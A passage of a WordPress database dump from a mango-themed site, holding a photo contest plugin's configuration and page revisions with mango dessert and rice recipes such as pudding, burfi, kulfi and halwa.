Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":false,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true},{\"id\":\"prizes\",\"title\":\"Prizes\",\"content\":\"\",\"collapsed\":false}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#209610\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#239913\",\"secondary\":\"#3eb538\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"7d5cf490966639d247a5458ac12bec7f\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-09 14:44:53','2022-02-09 09:14:53','',900,'https://mangomitra.in/?p=914',0,'revision','',0),(915,1,'2022-02-09 14:47:47','2022-02-09 09:17:47','','Artboard-3-8','','inherit','open','closed','','artboard-3-8','','','2022-02-09 14:47:47','2022-02-09 09:17:47','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-3-8.png',0,'attachment','image/png',0),(917,1,'2022-02-09 14:59:50','2022-02-09 09:29:50','','Artboard-1-8','','inherit','open','closed','','artboard-1-8','','','2022-02-09 14:59:50','2022-02-09 09:29:50','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-1-8.png',0,'attachment','image/png',0),(918,1,'2022-02-09 15:00:45','2022-02-09 09:30:45','','Artboard-2-8','','inherit','open','closed','','artboard-2-8','','','2022-02-09 15:00:45','2022-02-09 09:30:45','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-2-8.png',0,'attachment','image/png',0),(919,1,'2022-02-09 15:02:19','2022-02-09 09:32:19','','Artboard-4-8','','inherit','open','closed','','artboard-4-8','','','2022-02-09 15:02:19','2022-02-09 09:32:19','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-4-8.png',0,'attachment','image/png',0),(920,1,'2022-02-09 15:03:15','2022-02-09 09:33:15','','Artboard-5-8','','inherit','open','closed','','artboard-5-8','','','2022-02-09 15:03:15','2022-02-09 09:33:15','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-5-8.png',0,'attachment','image/png',0),(921,1,'2022-02-09 15:05:15','2022-02-09 09:35:15','','Artboard-7-8','','inherit','open','closed','','artboard-7-8','','','2022-02-09 15:05:15','2022-02-09 09:35:15','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-7-8.png',0,'attachment','image/png',0),(922,1,'2022-02-09 15:05:53','2022-02-09 09:35:53','','Artboard-6-8','','inherit','open','closed','','artboard-6-8','','','2022-02-09 15:05:53','2022-02-09 09:35:53','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Artboard-6-8.png',0,'attachment','image/png',0),(923,1,'2022-02-09 15:06:13','2022-02-09 09:36:13','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":922,\"width\":183,\"height\":183,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-6-8.png\" alt=\"\" class=\"wp-image-922\" width=\"183\" height=\"183\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":915,\"width\":-80,\"height\":-80,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-3-8.png\" alt=\"\" class=\"wp-image-915\" width=\"-80\" height=\"-80\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":920,\"width\":-152,\"height\":-152,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-5-8.png\" alt=\"\" class=\"wp-image-920\" width=\"-152\" height=\"-152\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":918,\"width\":-83,\"height\":-83,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-2-8.png\" alt=\"\" class=\"wp-image-918\" width=\"-83\" height=\"-83\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":917,\"width\":212,\"height\":212,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-1-8.png\" alt=\"\" class=\"wp-image-917\" width=\"212\" height=\"212\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":921,\"width\":-145,\"height\":-145,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-7-8.png\" alt=\"\" class=\"wp-image-921\" width=\"-145\" height=\"-145\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":919,\"width\":200,\"height\":200,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-4-8.png\" alt=\"\" class=\"wp-image-919\" width=\"200\" height=\"200\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-09 15:06:13','2022-02-09 09:36:13','',745,'https://mangomitra.in/?p=923',0,'revision','',0),(924,1,'2022-02-09 15:08:21','2022-02-09 09:38:21','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":922,\"width\":183,\"height\":183,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Artboard-6-8.png\" alt=\"\" class=\"wp-image-922\" width=\"183\" height=\"183\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams 